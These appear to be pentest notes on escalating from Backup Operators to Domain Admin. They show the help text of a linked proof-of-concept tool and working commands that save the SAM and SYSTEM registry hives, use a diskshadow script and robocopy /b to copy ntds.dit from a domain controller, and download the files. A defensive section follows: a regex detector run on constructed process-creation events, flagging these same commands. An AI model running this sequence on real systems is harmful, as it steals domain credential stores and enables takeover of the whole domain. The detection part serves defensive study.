https://github.com/mpgn/BackupOperatorToDA
# If you compromise an account that is a member of the Backup Operators group,
# you can become Domain Admin without RDP or WinRM access to the Domain Controller.
# With this POC you don't need WinRM or RDP access:
.\BackupOperatorToDA.exe -h
Backup Operator to Domain Admin (by @mpgn_x64)
This tool exist thanks to @filip_dragovic / https://github.com/Wh04m1001
Mandatory argument:
-t <TARGET> \\computer_name (ex: \\dc01.pouldard.wizard
-o <PATH> Where to store the sam / system / security files (can be UNC path)
Optional arguments:
-u <USER> Username
-p <PASSWORD> Password
-d <DOMAIN> Domain
-h help
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
# Mainly using WinRM
# On a workstation
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
# On a DC (locally)
nano poc.dsh
set context persistent nowriters
add volume c: alias poc
create
expose %poc% z:
unix2dos poc.dsh
cd C:\Temp
upload poc.dsh
diskshadow /s poc.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
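A detection-side counterpart to the steps above, added here as an example that is not part of the original notes or either linked project. It scans constructed process-creation records (Event ID 4688 style; the `host`/`user`/`cmd` field names are assumed) for the command patterns these steps leave behind: `reg save` of the SAM/SYSTEM/SECURITY hives, `diskshadow` driven by a script file, and `robocopy /b` copying ntds.dit, then flags accounts that chain several of them on one host.

```python
import re

# Regexes for the command lines used in the notes above (applied to the
# lower-cased command line). Each rule name is a label chosen for this example.
RULES = [
    ("hive_export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b")),
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\s+/s\s+\S+")),
    ("ntds_backup_copy", re.compile(r"\brobocopy(\.exe)?\s+/b\b.*\bntds(\.dit)?\b")),
]

# Constructed sample of 4688-style process creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\bkpsvc", "cmd": r"reg save hklm\sam c:\Temp\sam"},
    {"host": "DC01", "user": "CORP\\bkpsvc", "cmd": r"diskshadow /s poc.dsh"},
    {"host": "DC01", "user": "CORP\\bkpsvc", "cmd": r"robocopy /b z:\windows\ntds . ntds.dit"},
    # Benign activity that should not match: a normal robocopy job and a reg query.
    {"host": "WS07", "user": "CORP\\alice", "cmd": r"robocopy C:\Users\alice\docs D:\backup /e"},
    {"host": "WS07", "user": "CORP\\alice", "cmd": r"reg query hklm\software\microsoft"},
]


def match_rules(cmd):
    """Return the names of all rules whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmd.lower())]


def detect(events):
    """Return one finding per matching event as (host, user, rule, cmd)."""
    findings = []
    for ev in events:
        for rule in match_rules(ev["cmd"]):
            findings.append((ev["host"], ev["user"], rule, ev["cmd"]))
    return findings


def chained_hosts(findings, min_rules=2):
    """(host, user) pairs that triggered at least min_rules distinct rules.

    A single hive export or robocopy run can be a legitimate backup job; the
    combination of hive export, shadow-copy script and ntds.dit copy by one
    account on a domain controller is the sequence the notes describe.
    """
    seen = {}
    for host, user, rule, _ in findings:
        seen.setdefault((host, user), set()).add(rule)
    return sorted(key for key, rules in seen.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print("match:", finding)
    print("chained:", chained_hosts(detect(SAMPLE_EVENTS)))
```

Membership of Backup Operators on domain controllers should be reviewed alongside this, since the privilege itself is what makes the sequence work.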